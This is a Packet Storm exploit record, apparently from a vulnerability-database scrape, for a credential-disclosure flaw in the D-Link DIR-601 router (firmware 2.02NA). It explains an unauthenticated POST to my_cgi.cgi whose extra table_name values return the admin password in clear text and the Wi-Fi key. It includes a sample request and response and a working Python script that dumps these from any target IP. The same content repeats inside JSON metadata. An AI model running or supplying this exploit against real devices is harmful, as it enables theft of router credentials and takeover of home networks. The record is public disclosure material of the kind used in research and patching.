ID PACKETSTORM:148463 Type packetstorm Reporter Richard Rogerson Modified 2018-07-10T00:00:00
Description
`# Exploit title: D-Link DIR601 2.02NA - Credential disclosure
# Date: 2018-07-10
# Exploit Author: Richard Rogerson
# Vendor Homepage: http://ca.dlink.com/
# Software Link: http://support.dlink.ca/ProductInfo.aspx?m=DIR-601
# Version: <= 2.02NA
# Tested on: D-Link DIR601 Firmware 2.02NA
# Contact: http://twitter.com/pktlabs
# Website: https://www.packetlabs.net
# CVE: N/A
# Category: Webapps, Remote
# 1. Description:
# Through analyzing the Captcha function implemented in the DIR-601 (2.02NA firmware),
# a HTTP request was found responsible for the handoff to client-side code.
# Inspecting the HTTP requests, it was identified that a parameter named atable_namea
# is used to instruct the back-end application which content to return. By abusing this
# request, it was found possible to retrieve sensitive information relating to the device
# configuration and administrative credentials.
# It is possible to modify the HTTP POST to my_cgi.cgi and include as table_name references
# to retrieve the administrative credentials, wireless ssid, and pre-shared key where
# applicable. Enumerating the naming conventions within the client-side code, it was
# determined that a number of potentially sensitive parameters/tables exist in the
# back-end environment which provide significant value if retrieved, four of these include:
# - Admin_user
# - Wireless_settings
# - Wireless_security
# - Wireless_wpa_settings
Sample of the vulnerable POST request:
HTTP Request
POST /my_cgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.1/login_real.htm
Content-Length: 86
Connection: close
Pragma: no-cache
Cache-Control: no-cache
request=no_auth&request=load_settings&table_name=create_auth_pic&table_name=admin_user <- additional table requested
Sample response:
HTTP Response
HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 01 Jan 2011 00:57:12 GMT
Server: lighttpd/1.4.28
Content-Length: 228
<?xml version="1.0"?><root><login_level>1</login_level><show_authid>50649</show_authid><admin_user><admin_user_name>admin</admin_user_name><admin_user_pwd>clear-text-password</admin_user_pwd><admin_level>1</admin_level></admin_user></root>
# 2. Exploit Code:
#!/usr/bin/python
import socket,sys,urllib,urllib2
import xml.etree.ElementTree as ET
print """Packetlabs
====================================
D-Link DIR-601 Authorization Bypass
"""
if len(sys.argv) != 2:
print "usage:",sys.argv[0],"<ipaddr>"
sys.exit()
else:
ipaddr=sys.argv[1]
print "Retrieving admin username, password and wireless security configuration from",ipaddr
# build URL
url = 'http://'
url+= ipaddr
url+='/my_cgi.cgi'
data = "request=no_auth&request=load_settings&table_name=admin_user&table_name=user_user&table_name=wireless_settings&table_name=wireless_security&table_name=wireless_wpa_settings"
# send payload
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print "Sending payload to:",response.geturl()
retr = response.read()
root = ET.fromstring(retr)
# credential dump
print "\r\nAdmin Creds"
print "username:",root[0][0].text
print "password:",root[0][1].text
# dump wireless settings
print "\r\nWireless Settings"
sectype=int(root[3][0].text)
ssid=root[2][2].text
enctype="none"
print "SSID is:", ssid
if sectype == 2:
enctype="WPA2"
key=root[4][3].text
elif sectype == 1:
enctype="WEP("
keylength=int(root[3][3].text)
if keylength == 5:
enctype+="64bit)"
key=root[3][5].text
elif keylength == 13:
enctype+="128bit)"
key=root[3][9].text
else:
key="Error, please inspect xml manually above, keylength=",keylength
print retr
elif sectype == 0:
print "Wireless network is open?"
sys.exit()
print enctype,"key is:",key
`
{"id": "PACKETSTORM:148463", "bulletinFamily": "exploit", "title": "D-Link DIR601 2.02 Credential Disclosure", "description": "", "published": "2018-07-10T00:00:00", "modified": "2018-07-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/148463/D-Link-DIR601-2.02-Credential-Disclosure.html", "reporter": "Richard Rogerson", "references": [], "cvelist": [], "type": "packetstorm", "lastseen": "2018-07-11T09:34:57", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "cbf15cafe65630e7fca76a1da1450659"}, {"key": "modified", "hash": "126aa6199253ddc5259666d479153208"}, {"key": "published", "hash": "126aa6199253ddc5259666d479153208"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "d60371d661b0d482acb28a8d7c841e49"}, {"key": "sourceData", "hash": "feace4fdaf829652cf4a3c461c753d8c"}, {"key": "sourceHref", "hash": "97281891ee13ba021b14af89e863ddd0"}, {"key": "title", "hash": "9089a9c3531a5a1cbf400a366b533840"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "hash": "be99c11e8ca28b4f9886362b988d9c6a0ca0af7f33fceb16c33b3914a41dab2e", "viewCount": 1, "enchantments": {"score": {"value": -0.8, "vector": "NONE", "modified": "2018-07-11T09:34:57"}, "dependencies": {"references": [], "modified": "2018-07-11T09:34:57"}, "vulnersScore": -0.8}, "objectVersion": "1.3", "sourceHref": "https://packetstormsecurity.com/files/download/148463/dlinkdir601202-disclose.txt", "sourceData": "`# Exploit title: D-Link DIR601 2.02NA - Credential disclosure \n# Date: 2018-07-10 \n# Exploit Author: Richard Rogerson \n# Vendor Homepage: http://ca.dlink.com/ \n# Software Link: http://support.dlink.ca/ProductInfo.aspx?m=DIR-601 \n# Version: <= 2.02NA \n# Tested on: D-Link DIR601 Firmware 2.02NA \n# Contact: http://twitter.com/pktlabs \n# Website: https://www.packetlabs.net \n# CVE: N/A \n# Category: Webapps, Remote \n \n \n# 1. Description: \n# Through analyzing the Captcha function implemented in the DIR-601 (2.02NA firmware), \n# a HTTP request was found responsible for the handoff to client-side code. \n# Inspecting the HTTP requests, it was identified that a parameter named atable_namea \n# is used to instruct the back-end application which content to return. By abusing this \n# request, it was found possible to retrieve sensitive information relating to the device \n# configuration and administrative credentials. \n \n# It is possible to modify the HTTP POST to my_cgi.cgi and include as table_name references \n# to retrieve the administrative credentials, wireless ssid, and pre-shared key where \n# applicable. Enumerating the naming conventions within the client-side code, it was \n# determined that a number of potentially sensitive parameters/tables exist in the \n# back-end environment which provide significant value if retrieved, four of these include: \n \n# - Admin_user \n# - Wireless_settings \n# - Wireless_security \n# - Wireless_wpa_settings \n \nSample of the vulnerable POST request: \n \nHTTP Request \nPOST /my_cgi.cgi HTTP/1.1 \nHost: 192.168.0.1 \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nReferer: http://192.168.0.1/login_real.htm \nContent-Length: 86 \nConnection: close \nPragma: no-cache \nCache-Control: no-cache \n \nrequest=no_auth&request=load_settings&table_name=create_auth_pic&table_name=admin_user <- additional table requested \n \nSample response: \n \nHTTP Response \nHTTP/1.1 200 OK \nContent-type: text/xml \nConnection: close \nDate: Sat, 01 Jan 2011 00:57:12 GMT \nServer: lighttpd/1.4.28 \nContent-Length: 228 \n \n<?xml version=\"1.0\"?><root><login_level>1</login_level><show_authid>50649</show_authid><admin_user><admin_user_name>admin</admin_user_name><admin_user_pwd>clear-text-password</admin_user_pwd><admin_level>1</admin_level></admin_user></root> \n \n \n# 2. Exploit Code: \n \n#!/usr/bin/python \nimport socket,sys,urllib,urllib2 \nimport xml.etree.ElementTree as ET \n \nprint \"\"\"Packetlabs \n==================================== \nD-Link DIR-601 Authorization Bypass \n\"\"\" \nif len(sys.argv) != 2: \nprint \"usage:\",sys.argv[0],\"<ipaddr>\" \nsys.exit() \nelse: \nipaddr=sys.argv[1] \nprint \"Retrieving admin username, password and wireless security configuration from\",ipaddr \n \n# build URL \nurl = 'http://' \nurl+= ipaddr \nurl+='/my_cgi.cgi' \ndata = \"request=no_auth&request=load_settings&table_name=admin_user&table_name=user_user&table_name=wireless_settings&table_name=wireless_security&table_name=wireless_wpa_settings\" \n \n# send payload \nreq = urllib2.Request(url, data) \nresponse = urllib2.urlopen(req) \nprint \"Sending payload to:\",response.geturl() \nretr = response.read() \nroot = ET.fromstring(retr) \n \n# credential dump \nprint \"\\r\\nAdmin Creds\" \nprint \"username:\",root[0][0].text \nprint \"password:\",root[0][1].text \n \n# dump wireless settings \nprint \"\\r\\nWireless Settings\" \nsectype=int(root[3][0].text) \nssid=root[2][2].text \nenctype=\"none\" \n \nprint \"SSID is:\", ssid \nif sectype == 2: \nenctype=\"WPA2\" \nkey=root[4][3].text \nelif sectype == 1: \nenctype=\"WEP(\" \nkeylength=int(root[3][3].text) \nif keylength == 5: \nenctype+=\"64bit)\" \nkey=root[3][5].text \nelif keylength == 13: \nenctype+=\"128bit)\" \nkey=root[3][9].text \nelse: \nkey=\"Error, please inspect xml manually above, keylength=\",keylength \nprint retr \nelif sectype == 0: \nprint \"Wireless network is open?\" \nsys.exit() \n \nprint enctype,\"key is:\",key \n \n \n \n`\n"}
